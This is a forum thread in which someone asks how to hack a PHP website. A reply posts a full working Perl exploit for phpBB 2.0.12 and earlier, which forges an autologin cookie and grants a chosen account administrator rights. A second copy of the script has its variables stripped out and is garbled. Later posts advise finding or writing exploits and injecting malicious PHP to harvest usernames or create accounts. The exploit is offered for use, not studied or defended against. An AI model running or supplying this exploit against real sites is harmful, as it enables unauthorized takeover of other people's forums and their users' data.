An exploit to hack a php website?

[Sjoerd]

#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB &bull; View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)

# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "https://";
$request .= $host;
$request .= $path;


use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(https:\/\/)//eg;
$browser->proxy("http" , "https://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;

if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;

if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

# milw0rm.com [2005-03-21]

[GG2GG]

#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB &bull; View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)

# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;

my = ;
my = ;
my = ;
my = ;
my = "https://";
.= ;
.= ;


use HTTP::Cookies;
my = LWP::UserAgent->new ();
my = HTTP::Cookies->new( );
( );
( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",,,,,,);
if ( defined ) {
=~ s/(https://)//eg;
("http" , "https://");
}
print "++++++++++++++++++++++++++++++++++++n";
print "Trying to connect to "; if () {print "using proxy ";}

my = ();
die "Error: ",
unless ;

if( =~ m/phpbbprivmsg/) {
print "n Forum is vulnerable!!!n";
} else {
print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++nTrying to get the user: ID...n";
=~ /sid=([wd]*)/;
my = $1;

.= "admin/admin_ug_auth.php?mode=user&sid=";
= (
,
[
'username' => ,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ",
unless ;

if ( =~ /name="u" value="([d]*)"/)
{print " Done... ID=$1n++++++++++++++++++++++++++++++n";}
else {print "No user found..."; exit(); }
my = $1;
print "Trying to give user: admin status...n";

= (
,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> ,
'submit'=> 'Submit'
],
);
die "Error: ",
unless ;
print " Well done!!! should now have an admin status..n++++++++++++++++++++++++++++";

# milw0rm.com [2005-03-21]

way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.

to answer the question i would require a link to the site in question or informaiton about php scripts its running.

PHP is processed on server side and completely invisible on client side. near impossible to 'hack'

php is processed server sided but retrives information from the cilent, when dealing with hacking logins you use the language php, to communicate directly with mysql which holds the user and passwords, and either exploit and read from the mysql tables or by pass the login buy making the site belive you entered a vaild login.

in short find or create a exploit. insert the malicious php code ie retrive usernames or create users.

[Sjoerd]

way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.

to answer the question i would require a link to the site in question or informaiton about php scripts its running.

Lmao i do know how to use it :/